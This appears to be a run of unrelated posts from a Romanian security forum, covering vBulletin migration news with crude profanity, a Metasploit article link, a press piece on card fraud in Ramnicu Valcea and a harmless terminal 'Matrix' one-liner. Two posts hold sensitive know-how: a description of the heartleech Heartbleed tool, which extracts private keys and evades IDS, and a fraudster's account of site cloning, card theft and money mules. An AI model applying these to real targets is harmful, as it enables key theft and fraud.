explained in the original paper by Yuki, "Exploit IE Using Scriptable ActiveX Controls", but let's take a closer look at this magic trick. Articol complet: https://community.rapid7.com/community/metasploit/blog/2014/04/07/hack-away-at-the-unessential-with-explib2-in-metasploit

E de ceva timp lansat vB5 asta, speram sa fie stabil. E ok ca forum, foarte ok, doar ca mai sunt probleme. Bine, sunt multe probleme, dar nu ne asteptam sa fie, mai ales de securitate. Se pot importa posturile, manual, cu ceva munca, dar sunt prea putine si nu merita efortul. Era ceva important? Ca idee, au trecut pe ideea de "node". Forumurile sunt noduri. Posturile sunt noduri. Mesajele vizitatorilor sunt noduri. Toate vin la gramada in acelasi tabel. Exista un "contenttypeid" care le specifica tipul. E ok ca arhitectura, mai complexa si modulara. Dar e urat de importat si eu nu ma bag la asa ceva.

Acum merge? Thanks.

Ora?ul din România care a speriat planeta. Se câ?tig? 100.000 dolari/s?pt?mân? de?i tr?iesc câ?iva oameni Pentru turisti, Ramnicu Valcea este un oras linistit, cu multa verdeata. Aflat la marginea Carpatilor, in centrul Romaniei, nimeni nu banuieste secretul acestui oras, ingropat in cartierul muncitoresc Ostroveni: reteaua de hackeri din zona a speriat toata planeta, scrie Le Monde intr-un material preluat de worldcrunch.com si citat de incont.ro Trebuie sa parasesti bulevardul principal, care taie orasul in doua si sa mergi pe strazile inguste cu case construite in perioada comunista ca sa-ti dai seama ca ceva este in neregula in acest oras cu o populatie de aproximativ 100.000 de locuitori. Langa cladirile sarcacioase, ridicate in timpul dictaturii comuniste, sunt parcate numai masini scumpe. Pe langa masinile de ultima generatie, tinerii de 20-30 de ani isi afiseaza bunastarea care contrasteaza cu imprejurimile saracacioase. Bine ati venit pe taramul hackerilor! Ramnicu Valcea, cu cartierul sau Ostroveni, este recunoscut sub numele Hackerville, pentru ca este capitala furturilor online. Clientii care fac cumparaturi online din toata tarile – francezi, britanici, germani, italieni, dar mai ales americani, au fost inselati de hackerii romani. Potrivit Politiei Romane, 80% dintre victime provin din SUA. In Ostroveni, toata lumea stie ce se intampla, dar codul tacerii functioneaza foarte bine. Unul dintre hackeri a fost de acord sa vorbeasca cu jurnalistii Le Monde despre afacerea sa, atata timp cat ramane anonim. „Este mai usor cu americanii pentru ca isi cumpara inclusiv painea online, sunt obisnuiti sa faca totul pe internet”, a declarat tanarul. El sustine ca da patru sau cinci lovituri pe saptamana si in final ramane cu cateva zeci sau cateva sute de mii de dolari. „Traim intr-o lume mare, plina de idioti, care sunt gata sa faca totul online. Noi vindem produse fictive, clonam alte site-uri si furam datele cartilor de credit. In Europa, pentru a pune mana pe bani, folosim asa-numitele sau , care redirectioneaza banii trimisi intr-un anumit cont. Ei pastreaza 30% din bani si restul ni-i trimit noua prin Western Union”, explica hackerul. Si judecand dupa numarul tranzactiilor facute prin Western Union in Ramnicu Valcea, afacerea pare sa fie infloritoare, comenteaza jurnalistii Le Monde. MAi multe pe incont.ro. Sursa: Ora?ul din România care a speriat planeta. Se câ?tig? 100.000 dolari/s?pt?mân? de?i tr?iesc câ?iva oameni | Obiectiv - Mobil Stiu, articol de 2 lei, dar cred ca astfel de articole apar despre "noi" prin presa internationala.

[h=1]heartleech[/h] A typical "heartbleed" tool. What makes this different is: autopwn most (-a) that does all the steps neeeded to get private key post-handshake (encrypted) heartbeats instead of during handshake evades Snort IDS rules loops making repeated requests (-l <loopcount>) dumps binary data to file (-f <filename>) IPv4 or IPv6 (-v <IPver>) full 64k heartbleeds Sursa: https://github.com/robertdavidgraham/heartleech

Muie ba, nici acum nu va convine, nu aveam cum sa portez datele de pe noua platforma aici, au o alta structura interna a bazei de date.

[h=1]Matrix Style[/h] echo -e "\e[32m"; while :; do for i in {1..16}; do r="$(($RANDOM % 2))"; if [[ $(($RANDOM % 5)) == 1 ]]; then if [[ $(($RANDOM % 4)) == 1 ]]; then v+="\e[1m $r "; else v+="\e[2m $r "; fi; else v+=" "; fi; done; echo -e "$v"; v=""; done tr -c "[:digit:]" " " < /dev/urandom | dd cbs=$COLUMNS conv=unblock | GREP_COLOR="1;32" grep --color "[^ ]" LC_ALL=C tr -c "[:digit:]" " " < /dev/urandom | dd cbs=$COLUMNS conv=unblock | GREP_COLOR="1;32" grep --color "[^ ]" Altele: Matrix Style | commandlinefu.com

A job opening matching your profile for a position of Information Security Monitoring Officer-033319 has just been posted in our Career Section. If you would like to apply online, click here or click Jobs to consult the list of other positions currently available. We thank you for your interest in ING. Best regards, The ING Recruitment team // L-am primit automat.

Salut, In urma problemelor cu vBulletin 5 am decis sa revenim la vechiul forum. Intre timp vom lucra la noua versiune si cand va fi totul gata o vom lansa. Momentan ne bagam toti pula in vBulletin si in jegul lor. Toata muia din lume. Daca aveti probleme, postati aici. Have fun!

Solutia e de la vBulletin, nu ne apucam noi sa facem aplicatii mobile. Are suport doar pentru Android si iPhone.

Intrati pe RST cd pe smartphone sau ati vrea sa intrati? PS: Android si iPhone.

The fuck? "First, Mylar allows the server to perform keyword search over encrypted documents, even if the documents are encrypted with different keys."